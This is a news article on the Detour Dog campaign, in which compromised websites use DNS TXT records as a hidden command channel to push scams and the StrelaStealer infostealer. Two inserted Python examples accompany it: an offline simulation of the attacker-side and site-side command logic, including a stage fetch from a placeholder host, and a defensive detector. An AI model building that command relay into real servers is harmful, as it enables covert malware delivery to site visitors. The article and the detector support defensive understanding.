
A sprawling, malicious network has turned 30,000 websites into a sinister slot machine for millions of visitors. Most see harmless content, but some will get funneled into scams, and an unlucky 1% will receive malware. Security researchers unveil the overwhelming complexity behind the scenes.
Security researchers at Infoblox have uncovered a massive network of 30,000 unique website addresses across 584 top-level domains, such as .com.
These websites contain no malware or scams themselves, yet they serve as part of a massive delivery system for scams and information stealers.
How? Well, once in a while, they redirect visitors using a hidden, sophisticated command-and-control system.
Most visits look normal, and roughly 90% of the time, the websites do nothing malicious. However, they check visitors’ location and device types, redirecting 9% to scams and serving StrelaStealer to the remaining 1%.
This powerful malware has evolved over the past few years to exfiltrate email credentials from email clients such as Outlook and Thunderbird. It was previously used to compromise many companies in Germany, Spain, and other countries.
“We suspect they limit redirections in part to avoid detection,” Infoblox Threat Intel researchers said in a report.
The uncovered websites generate millions of visits per day. Part of the traffic comes from bots, likely fueling ad fraud.
DNS trickery used for control
The hackers behind the campaign use many evasive tactics to remain undetected.
Particularly novel is their use of a hidden command-and-control system based on DNS (Domain Name System) that decides which visitors are redirected to what malicious content.
Normally, DNS translates website addresses to IP addresses for browsers or other apps. However, the hackers figured they could use DNS queries to deliver malicious instructions between their servers.
Attackers control their DNS server, which then decides what content to serve on which websites for which user.
This also misleads network defenders, because they can’t find malware or any malicious content on the websites themselves, and it is hard to reproduce malicious redirections. Many of these websites remain compromised for months or over a year.
“A novel setup like this would allow an attacker to hide their identity behind compromised websites, making their operations more resilient,” the Infoblox researchers said.
The DNS queries are not visible to website visitors because they are made server-side by the compromised web server, not by the browser. For hosting and other service providers, they look like routine DNS traffic.
The attackers use ordinary DNS TXT lookups: a TXT record is simply a short text string, so the same query can carry both the command and the link to the next stage. DNS acts as both a command channel and a delivery mechanism.
Here’s how the simplified attack chain usually works in practice:
- The victim visits one of the thousands of compromised websites
- The compromised website sends the DNS queries with user information: IP, device type, and a random string for identification
- Attacker-controlled DNS server responds with a text record containing a command and a link. Responses are obfuscated using Base64
- The web server then fetches the next-stage payload and relays the output to the user
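The exchange described in the list above, modelled end to end in Python as an added example (not code from the report or from the Detour Dog infrastructure). The zone name, the label layout of the query, the JSON shape inside the TXT record and the URLs are all assumptions made for illustration; the 90/9/1 split and the device check are taken from the article, and the network fetch is replaced by a caller-supplied function so it runs offline.

```python
import base64
import json
import secrets
from dataclasses import dataclass
from typing import Callable

# Hypothetical names used only for this illustration; none appear in the report.
C2_ZONE = "c2.example"
SCAM_URL = "https://tds.example/landing"
STAGE_URL = "https://stage.example/downloader.txt"


@dataclass
class Visitor:
    ip: str
    device: str  # e.g. "windows", "android", "ios"


def build_query_name(visitor: Visitor, nonce: str = "") -> str:
    """Compromised-site side: fold visitor IP, device and a random string into
    the TXT query name. The label layout (ip.device.nonce.zone) is an assumption."""
    nonce = nonce or secrets.token_hex(4)
    return f"{visitor.ip.replace('.', '-')}.{visitor.device}.{nonce}.{C2_ZONE}"


def c2_txt_answer(qname: str, roll: int) -> str:
    """Attacker DNS side: choose a command for this visitor and return it as a
    Base64-encoded TXT string. `roll` (0-99) stands in for the operator's own
    selection logic; the 90/9/1 split is the reported one. Assumed here: the
    stealer stage is only handed to Windows visitors, others fall back to a scam."""
    device = qname.split(".")[1]
    if roll < 90:
        cmd = {"cmd": "none"}
    elif roll < 99 or device != "windows":
        cmd = {"cmd": "redirect", "url": SCAM_URL}
    else:
        cmd = {"cmd": "fetch", "url": STAGE_URL}
    return base64.b64encode(json.dumps(cmd).encode()).decode()


def parse_txt_answer(txt: str) -> dict:
    """Compromised-site side: decode the TXT record. Anything malformed is
    treated as 'no command', so the page keeps looking normal on failure."""
    try:
        cmd = json.loads(base64.b64decode(txt, validate=True))
    except ValueError:  # bad Base64, bad UTF-8 or bad JSON
        return {"cmd": "none"}
    if (isinstance(cmd, dict) and cmd.get("cmd") in ("redirect", "fetch")
            and isinstance(cmd.get("url"), str)):
        return cmd
    return {"cmd": "none"}


def simulate_visit(visitor: Visitor, roll: int, fetch: Callable[[str], str]) -> dict:
    """One visit end to end: build the query, obtain the TXT answer, act on it.
    `fetch` stands in for the server-side HTTP request for the next stage."""
    qname = build_query_name(visitor)
    cmd = parse_txt_answer(c2_txt_answer(qname, roll))
    if cmd["cmd"] == "redirect":
        return {"action": "redirect", "location": cmd["url"]}
    if cmd["cmd"] == "fetch":
        # The web server, not the visitor, retrieves the stage and relays it.
        return {"action": "relay", "body": fetch(cmd["url"])}
    return {"action": "serve_original"}


if __name__ == "__main__":
    fake_fetch = lambda url: f"<stage fetched from {url}>"
    for roll in (5, 95, 99):
        print(roll, simulate_visit(Visitor("203.0.113.5", "windows"), roll, fake_fetch))
```

The point to notice is on the compromised-site side: the visitor's browser only ever sees a normal page, a redirect, or relayed content from the site it trusted; the TXT lookup and the fetch of the stage both originate from the web server, which is why scanning the site for malware finds nothing.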
“The attack cleverly leverages DNS as a covert channel to orchestrate a multi-step delivery process. URLs embedded in DNS TXT records are used to fetch staged payloads – first a downloader script, then a ZIP file – all relayed back to the victim via compromised infrastructure,” the report reads.
The sheer scale of this scheme is astonishing. When the researchers reported one of the attacker-controlled DNS servers, its domain was sinkholed by the Shadowserver Foundation, a non-profit that coordinates actions with internet service providers and law enforcement organizations.
In 48 hours, the researchers collected over 39 million queries from approximately 30,000 infected hosts.
“We believe this has created a novel networked malware distribution model using DNS in which the different stages are fetched from different hosts under the threat actor’s control and are relayed back when the user interacts with the campaign lure, for example, the email attachment,” the Infoblox researchers said.
Scams from notorious traffic distribution systems (TDS)
The report also details that in cases when victims see scams, the network fetches content from the Help TDS operation, which is intertwined with one of the largest criminal traffic distribution networks.
Such TDSes route compromised website visitors to various malicious destinations, likely controlled by multiple threat actors. Based on their profiles and targeting criteria, the users might get malicious ads for adult dating, crypto scams, antivirus or malware fraud, and others.
Previous reports warned that Help TDS specializes in tech support scams utilizing full-screen browser manipulation.
Help TDS also routes traffic to other TDSes, like Monetizer TDS, which in turn redirect to other malware, scams, stealers, fake CAPTCHAs, etc.
Only recently, in June, did the threat actor start serving the infostealer directly to roughly 1% of visitors to the controlled websites using its own infrastructure. The cybercriminals played a major role in campaigns spreading StrelaStealer.
Takedown requests ignored by the registrar
The threat actors behind the campaign abuse the so-called bulletproof hosting and registrars, which deliberately ignore abuse complaints and sometimes even law enforcement requests.
On June 24th, 2025, Infoblox researchers reported webdmonitor[.]io, one of the identified command-and-control servers used by the attackers, to WebNIC, a large domain name registrar in Asia. Despite a series of 16 email exchanges and detailed explanations of how the malware operated, the registrar did not suspend the domain.
“We have notified the respective parties to investigate and take the necessary action,” the registrar responded.
Similar situations prompted ICANN to independently send WebNIC a notification, warning that it was violating its registrar agreement by failing to properly address domain abuse.
Only the sinkholing stopped the malicious activity, and within hours the cybercriminals replaced their DNS (C2) domain with another one. This was again sinkholed a week later. At least two other C2 servers have been observed running currently, orchestrating thousands of websites.
The hackers also previously used Cloudflare to front their C2 domains, hiding the true IP addresses.
“After multiple disruptions, the actor began to openly run their servers, most recently in an IP space belonging to Kazakhstan.”
Who’s behind this malicious operation?
Infoblox researchers dubbed the primary cybercriminal group Detour Dog. The threat actor's history dates back to February 2020. For years, Detour Dog exclusively forwarded all traffic to the criminal traffic distribution systems Los Pollos TDS and its successor Help TDS.
These malicious networks were previously leveraged by Russian Doppelgänger disinformation campaigns.
Since spring 2025, Detour Dog-controlled websites have started serving malware.
Another distinct threat actor, dubbed Hive0145, operates StrelaStealer. This malware has checks in place to avoid infecting systems in Russia. The operators previously used broadly distributed email campaigns to spread the infostealer.
“It’s possible, based on history from the last four years, that Detour Dog is providing a service to others, in which case Hive0145 may just be the first partner to receive malware distribution support via the network of infected hosts,” the report explains.
The researchers warn that Detour Dog turns routine web traffic into business risk – traditional security tools miss server-side DNS activity. They suggest using DNS as a frontline mechanism for disrupting attacks before they ever reach users or companies.
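One way to act on that advice in practice, as an added example that is not part of the report: a small detector that runs over resolver logs and looks for the signature the article describes, namely a web server making TXT queries with many unique, encoded subdomains under one zone, and receiving answers that are Base64 text rather than the SPF/DMARC-style records TXT lookups normally return. The log format, the registered-domain approximation (last two labels) and the thresholds are assumptions; the sample log lines are constructed for this example, with the Base64 answers generated in code so they are self-consistent.

```python
import base64
import json
from collections import defaultdict


def _b64(obj) -> str:
    return base64.b64encode(json.dumps(obj).encode()).decode()


# Constructed resolver log (not from the report): "ts client qname qtype answer".
# 10.0.0.5 is an internal web server; c2.example is a hypothetical C2 zone.
SAMPLE_LOG = "\n".join([
    f"2025-07-01T10:00:01Z 10.0.0.5 203-0-113-5.windows.9f3a1c2e.c2.example TXT {_b64({'cmd': 'none'})}",
    f"2025-07-01T10:00:02Z 10.0.0.5 198-51-100-7.android.0b77d1aa.c2.example TXT {_b64({'cmd': 'none'})}",
    f"2025-07-01T10:00:03Z 10.0.0.5 192-0-2-44.ios.5e2c9b10.c2.example TXT "
    f"{_b64({'cmd': 'redirect', 'url': 'https://tds.example/landing'})}",
    f"2025-07-01T10:00:04Z 10.0.0.5 203-0-113-9.windows.71aa0c3d.c2.example TXT "
    f"{_b64({'cmd': 'fetch', 'url': 'https://stage.example/downloader.txt'})}",
    "2025-07-01T10:00:05Z 10.0.0.5 _dmarc.example.com TXT v=DMARC1;p=reject",
    "2025-07-01T10:00:06Z 10.0.0.5 example.com TXT v=spf1 -all",
    "2025-07-01T10:00:07Z 10.0.0.7 mail.example.org TXT v=spf1 -all",
    "2025-07-01T10:00:08Z 10.0.0.7 www.example.org A 198.51.100.20",
])


def registered_domain(qname: str) -> str:
    """Crude 'last two labels' approximation; a real deployment would use the
    Public Suffix List so that zones like co.uk are not collapsed."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def looks_like_b64_text(answer: str) -> bool:
    """True if the TXT answer is strict Base64 that decodes to printable text.
    SPF/DMARC/DKIM records fail this: they contain '=', ';', spaces, etc."""
    try:
        raw = base64.b64decode(answer, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return False
    return bool(text) and text.isprintable()


def find_dns_c2_candidates(log: str, min_unique_names: int = 3) -> dict:
    """Group TXT queries per registered domain and flag domains where every
    answer is Base64 text and the query names keep changing (per-visitor
    encoding). Returns {domain: summary} for flagged domains only."""
    stats = defaultdict(lambda: {"names": set(), "clients": set(),
                                 "total": 0, "b64_answers": 0})
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, qtype, answer = line.split(maxsplit=4)
        if qtype != "TXT":
            continue
        s = stats[registered_domain(qname)]
        s["total"] += 1
        s["names"].add(qname)
        s["clients"].add(client)
        if looks_like_b64_text(answer):
            s["b64_answers"] += 1

    flagged = {}
    for domain, s in stats.items():
        if len(s["names"]) >= min_unique_names and s["b64_answers"] == s["total"]:
            flagged[domain] = {
                "unique_names": len(s["names"]),
                "queries": s["total"],
                "clients": sorted(s["clients"]),
            }
    return flagged


if __name__ == "__main__":
    for domain, summary in find_dns_c2_candidates(SAMPLE_LOG).items():
        print(domain, summary)
```

Two caveats a practitioner should keep in mind: the detector only sees this traffic if the web servers resolve through a logging resolver rather than straight to the attacker's authoritative server, so egress DNS should be forced through it; and legitimate services do publish Base64-looking TXT records (DKIM public keys, some verification tokens), which is why the rule keys on many distinct, changing query names under one zone rather than on the answer encoding alone.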